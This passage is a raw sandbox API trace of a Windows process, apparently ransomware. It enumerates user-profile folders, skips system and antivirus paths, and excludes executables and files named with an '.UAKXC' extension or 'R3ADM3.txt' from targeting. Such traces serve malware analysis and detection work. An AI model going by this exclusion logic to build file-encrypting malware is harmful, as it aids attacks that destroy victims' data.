hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.321] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0141.321] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef26c8 [0141.322] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c60 [0141.322] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec3c0 | out: hHeap=0xea0000) returned 1 [0141.322] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0141.322] lstrcmpW (lpString1="Application Data", lpString2=".") returned 1 [0141.322] lstrcmpW (lpString1="Application Data", lpString2="..") returned 1 [0141.322] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0141.322] lstrcmpW (lpString1="Contacts", lpString2=".") returned 1 [0141.322] lstrcmpW (lpString1="Contacts", lpString2="..") returned 1 [0141.322] StrStrIW (lpFirst="Contacts", lpSrch="tmp") returned 0x0 [0141.322] StrStrIW (lpFirst="Contacts", lpSrch="winnt") returned 0x0 [0141.322] StrStrIW (lpFirst="Contacts", lpSrch="temp") returned 0x0 [0141.322] StrStrIW (lpFirst="Contacts", lpSrch="thumb") returned 0x0 [0141.322] StrStrIW (lpFirst="Contacts", lpSrch="$Recycle.Bin") returned 0x0 [0141.322] StrStrIW (lpFirst="Contacts", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.322] StrStrIW (lpFirst="Contacts", lpSrch="System Volume Information") returned 0x0 [0141.322] StrStrIW (lpFirst="Contacts", lpSrch="Boot") returned 0x0 [0141.322] StrStrIW (lpFirst="Contacts", lpSrch="Windows") returned 0x0 [0141.322] StrStrIW (lpFirst="Contacts", lpSrch="Trend Micro") returned 0x0 [0141.322] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2740 [0141.322] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0141.322] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.322] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xeec3c0 [0141.322] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.322] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0141.322] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2740 | out: hHeap=0xea0000) returned 1 [0141.322] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2740 [0141.322] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2aa8 [0141.322] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec3c0 | out: hHeap=0xea0000) returned 1 [0141.322] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0141.323] lstrcmpW (lpString1="Cookies", lpString2=".") returned 1 [0141.323] lstrcmpW (lpString1="Cookies", lpString2="..") returned 1 [0141.323] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2516f480, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x2516f480, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0141.323] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0141.323] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0141.323] StrStrIW (lpFirst="Desktop", lpSrch="tmp") returned 0x0 [0141.323] StrStrIW (lpFirst="Desktop", lpSrch="winnt") returned 0x0 [0141.323] StrStrIW (lpFirst="Desktop", lpSrch="temp") returned 0x0 [0141.323] StrStrIW (lpFirst="Desktop", lpSrch="thumb") returned 0x0 [0141.323] StrStrIW (lpFirst="Desktop", lpSrch="$Recycle.Bin") returned 0x0 [0141.323] StrStrIW (lpFirst="Desktop", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.323] StrStrIW (lpFirst="Desktop", lpSrch="System Volume Information") returned 0x0 [0141.323] StrStrIW (lpFirst="Desktop", lpSrch="Boot") returned 0x0 [0141.323] StrStrIW (lpFirst="Desktop", lpSrch="Windows") returned 0x0 [0141.323] StrStrIW (lpFirst="Desktop", lpSrch="Trend Micro") returned 0x0 [0141.323] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0141.323] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.323] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xeec3c0 [0141.323] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.323] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0141.323] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef26f0 [0141.323] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3130 [0141.323] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec3c0 | out: hHeap=0xea0000) returned 1 [0141.323] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdb0c98e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdb0c98e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0141.323] lstrcmpW (lpString1="Documents", lpString2=".") returned 1 [0141.323] lstrcmpW (lpString1="Documents", lpString2="..") returned 1 [0141.323] StrStrIW (lpFirst="Documents", lpSrch="tmp") returned 0x0 [0141.323] StrStrIW (lpFirst="Documents", lpSrch="winnt") returned 0x0 [0141.324] StrStrIW (lpFirst="Documents", lpSrch="temp") returned 0x0 [0141.324] StrStrIW (lpFirst="Documents", lpSrch="thumb") returned 0x0 [0141.324] StrStrIW (lpFirst="Documents", lpSrch="$Recycle.Bin") returned 0x0 [0141.324] StrStrIW (lpFirst="Documents", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.324] StrStrIW (lpFirst="Documents", lpSrch="System Volume Information") returned 0x0 [0141.324] StrStrIW (lpFirst="Documents", lpSrch="Boot") returned 0x0 [0141.324] StrStrIW (lpFirst="Documents", lpSrch="Windows") returned 0x0 [0141.324] StrStrIW (lpFirst="Documents", lpSrch="Trend Micro") returned 0x0 [0141.324] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef26a0 [0141.324] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0141.324] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.324] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xeec3c0 [0141.324] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.324] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0141.324] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef26a0 | out: hHeap=0xea0000) returned 1 [0141.324] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef26a0 [0141.324] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3188 [0141.324] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec3c0 | out: hHeap=0xea0000) returned 1 [0141.324] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0141.324] lstrcmpW (lpString1="Downloads", lpString2=".") returned 1 [0141.324] lstrcmpW (lpString1="Downloads", lpString2="..") returned 1 [0141.324] StrStrIW (lpFirst="Downloads", lpSrch="tmp") returned 0x0 [0141.324] StrStrIW (lpFirst="Downloads", lpSrch="winnt") returned 0x0 [0141.324] StrStrIW (lpFirst="Downloads", lpSrch="temp") returned 0x0 [0141.324] StrStrIW (lpFirst="Downloads", lpSrch="thumb") returned 0x0 [0141.324] StrStrIW (lpFirst="Downloads", lpSrch="$Recycle.Bin") returned 0x0 [0141.324] StrStrIW (lpFirst="Downloads", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.324] StrStrIW (lpFirst="Downloads", lpSrch="System Volume Information") returned 0x0 [0141.324] StrStrIW (lpFirst="Downloads", lpSrch="Boot") returned 0x0 [0141.325] StrStrIW (lpFirst="Downloads", lpSrch="Windows") returned 0x0 [0141.325] StrStrIW (lpFirst="Downloads", lpSrch="Trend Micro") returned 0x0 [0141.325] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2538 [0141.325] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0141.325] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.325] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xeec3c0 [0141.325] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.325] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0141.325] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2538 | out: hHeap=0xea0000) returned 1 [0141.325] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2538 [0141.325] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec32e8 [0141.325] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec3c0 | out: hHeap=0xea0000) returned 1 [0141.325] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0141.325] lstrcmpW (lpString1="Favorites", lpString2=".") returned 1 [0141.325] lstrcmpW (lpString1="Favorites", lpString2="..") returned 1 [0141.325] StrStrIW (lpFirst="Favorites", lpSrch="tmp") returned 0x0 [0141.325] StrStrIW (lpFirst="Favorites", lpSrch="winnt") returned 0x0 [0141.325] StrStrIW (lpFirst="Favorites", lpSrch="temp") returned 0x0 [0141.325] StrStrIW (lpFirst="Favorites", lpSrch="thumb") returned 0x0 [0141.325] StrStrIW (lpFirst="Favorites", lpSrch="$Recycle.Bin") returned 0x0 [0141.325] StrStrIW (lpFirst="Favorites", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.325] StrStrIW (lpFirst="Favorites", lpSrch="System Volume Information") returned 0x0 [0141.325] StrStrIW (lpFirst="Favorites", lpSrch="Boot") returned 0x0 [0141.325] StrStrIW (lpFirst="Favorites", lpSrch="Windows") returned 0x0 [0141.326] StrStrIW (lpFirst="Favorites", lpSrch="Trend Micro") returned 0x0 [0141.326] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2628 [0141.326] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0141.326] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.326] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xeec3c0 [0141.326] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.326] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0141.326] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2628 | out: hHeap=0xea0000) returned 1 [0141.326] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2628 [0141.326] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3398 [0141.326] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec3c0 | out: hHeap=0xea0000) returned 1 [0141.326] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0141.326] lstrcmpW (lpString1="Links", lpString2=".") returned 1 [0141.326] lstrcmpW (lpString1="Links", lpString2="..") returned 1 [0141.326] StrStrIW (lpFirst="Links", lpSrch="tmp") returned 0x0 [0141.326] StrStrIW (lpFirst="Links", lpSrch="winnt") returned 0x0 [0141.326] StrStrIW (lpFirst="Links", lpSrch="temp") returned 0x0 [0141.326] StrStrIW (lpFirst="Links", lpSrch="thumb") returned 0x0 [0141.326] StrStrIW (lpFirst="Links", lpSrch="$Recycle.Bin") returned 0x0 [0141.326] StrStrIW (lpFirst="Links", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.326] StrStrIW (lpFirst="Links", lpSrch="System Volume Information") returned 0x0 [0141.326] StrStrIW (lpFirst="Links", lpSrch="Boot") returned 0x0 [0141.326] StrStrIW (lpFirst="Links", lpSrch="Windows") returned 0x0 [0141.326] StrStrIW (lpFirst="Links", lpSrch="Trend Micro") returned 0x0 [0141.326] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0141.327] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.327] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xeec3c0 [0141.327] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.327] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0141.327] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef25b0 [0141.327] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec33f0 [0141.327] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec3c0 | out: hHeap=0xea0000) returned 1 [0141.327] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0141.327] lstrcmpW (lpString1="Local Settings", lpString2=".") returned 1 [0141.327] lstrcmpW (lpString1="Local Settings", lpString2="..") returned 1 [0141.327] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdb6bcfe0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdb6bcfe0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0141.327] lstrcmpW (lpString1="Music", lpString2=".") returned 1 [0141.327] lstrcmpW (lpString1="Music", lpString2="..") returned 1 [0141.327] StrStrIW (lpFirst="Music", lpSrch="tmp") returned 0x0 [0141.327] StrStrIW (lpFirst="Music", lpSrch="winnt") returned 0x0 [0141.327] StrStrIW (lpFirst="Music", lpSrch="temp") returned 0x0 [0141.327] StrStrIW (lpFirst="Music", lpSrch="thumb") returned 0x0 [0141.327] StrStrIW (lpFirst="Music", lpSrch="$Recycle.Bin") returned 0x0 [0141.327] StrStrIW (lpFirst="Music", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.327] StrStrIW (lpFirst="Music", lpSrch="System Volume Information") returned 0x0 [0141.327] StrStrIW (lpFirst="Music", lpSrch="Boot") returned 0x0 [0141.327] StrStrIW (lpFirst="Music", lpSrch="Windows") returned 0x0 [0141.327] StrStrIW (lpFirst="Music", lpSrch="Trend Micro") returned 0x0 [0141.327] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0141.327] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.328] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xeec3c0 [0141.328] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.328] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0141.328] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2ab0 [0141.328] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3448 [0141.328] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec3c0 | out: hHeap=0xea0000) returned 1 [0141.328] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0141.328] lstrcmpW (lpString1="My Documents", lpString2=".") returned 1 [0141.328] lstrcmpW (lpString1="My Documents", lpString2="..") returned 1 [0141.328] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0141.328] lstrcmpW (lpString1="NetHood", lpString2=".") returned 1 [0141.328] lstrcmpW (lpString1="NetHood", lpString2="..") returned 1 [0141.328] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8f3afd80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8f3afd80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0141.328] lstrcmpW (lpString1="NTUSER.DAT", lpString2=".") returned 1 [0141.328] lstrcmpW (lpString1="NTUSER.DAT", lpString2="..") returned 1 [0141.328] StrStrIW (lpFirst="NTUSER.DAT", lpSrch=".UAKXC") returned 0x0 [0141.328] StrStrIW (lpFirst="NTUSER.DAT", lpSrch=".exe") returned 0x0 [0141.328] StrStrIW (lpFirst="NTUSER.DAT", lpSrch=".dll") returned 0x0 [0141.328] StrStrIW (lpFirst="NTUSER.DAT", lpSrch=".lnk") returned 0x0 [0141.328] StrStrIW (lpFirst="NTUSER.DAT", lpSrch=".sys") returned 0x0 [0141.328] StrStrIW (lpFirst="NTUSER.DAT", lpSrch=".msi") returned 0x0 [0141.328] StrStrIW (lpFirst="NTUSER.DAT", lpSrch="R3ADM3.txt") returned 0x0 [0141.328] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2ad8 [0141.328] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0141.328] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.328] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec3c0 [0141.328] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.328] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0141.328] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2ad8 | out: hHeap=0xea0000) returned 1 [0141.329] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec560 [0141.329] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2ad8 [0141.329] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec4f8 [0141.329] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec560 | out: hHeap=0xea0000) returned 1 [0141.329] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec3c0 | out: hHeap=0xea0000) returned 1 [0141.329] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x8f389c20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0141.329] lstrcmpW (lpString1="ntuser.dat.LOG1", lpString2=".") returned 1 [0141.329] lstrcmpW (lpString1="ntuser.dat.LOG1", lpString2="..") returned 1 [0141.329] StrStrIW (lpFirst="ntuser.dat.LOG1", lpSrch=".UAKXC") returned 0x0 [0141.329] StrStrIW (lpFirst="ntuser.dat.LOG1", lpSrch=".exe") returned 0x0 [0141.329] StrStrIW (lpFirst="ntuser.dat.LOG1", lpSrch=".dll") returned 0x0 [0141.329] StrStrIW (lpFirst="ntuser.dat.LOG1", lpSrch=".lnk") returned 0x0 [0141.329] StrStrIW (lpFirst="ntuser.dat.LOG1", lpSrch=".sys") returned 0x0 [0141.329] StrStrIW (lpFirst="ntuser.dat.LOG1", lpSrch=".msi") returned 0x0 [0141.329] StrStrIW (lpFirst="ntuser.dat.LOG1", lpSrch="R3ADM3.txt") returned 0x0 [0141.329] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2b00 [0141.329] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0141.329] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.329] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec3c0 [0141.329] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.329] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0141.330] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2b00 | out: hHeap=0xea0000) returned 1 [0141.330] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec560 [0141.330] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2b00 [0141.330] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec5c8 [0141.330] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec560 | out: hHeap=0xea0000) returned 1 [0141.330] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec3c0 | out: hHeap=0xea0000) returned 1 [0141.330] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, 